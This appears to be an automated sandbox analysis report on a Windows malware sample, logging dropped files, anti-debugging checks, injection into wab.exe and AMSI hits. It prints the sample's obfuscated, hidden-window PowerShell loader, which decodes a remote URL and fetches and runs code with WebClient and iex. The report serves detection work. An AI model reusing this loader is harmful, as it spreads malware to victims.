              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4460
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5418
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5858
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3995
Source: C:\Program Files (x86)\Windows Mail\wab.exe; Dropped PE files which have not been started:
    C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
    C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
    C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
    C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
    C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
    C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
    C:\Windows\svchost.com
    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
    C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
    C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
    C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
    C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
    C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
    C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
    C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
    C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
    C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
    C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
    C:\Program Files (x86)\AutoIt3\Au3Check.exe
    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
    C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
    C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
    C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
    C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
    C:\Users\user\AppData\Local\Temp\chrome.exe
    C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
    C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
    C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
    C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
    C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
    C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
    C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE
    C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
    C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
    C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
    C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe
    C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
    C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 | Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892 | Thread sleep count: 5858 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896 | Thread sleep count: 3995 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7924 | Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW t.
              Source: wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2188971993.000001E2CCF37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ )
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread information set: HideFromDebugger
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread information set: HideFromDebugger
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07B449B0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,5_2_07B449B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_7596.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3F20000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C9FA4C
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn 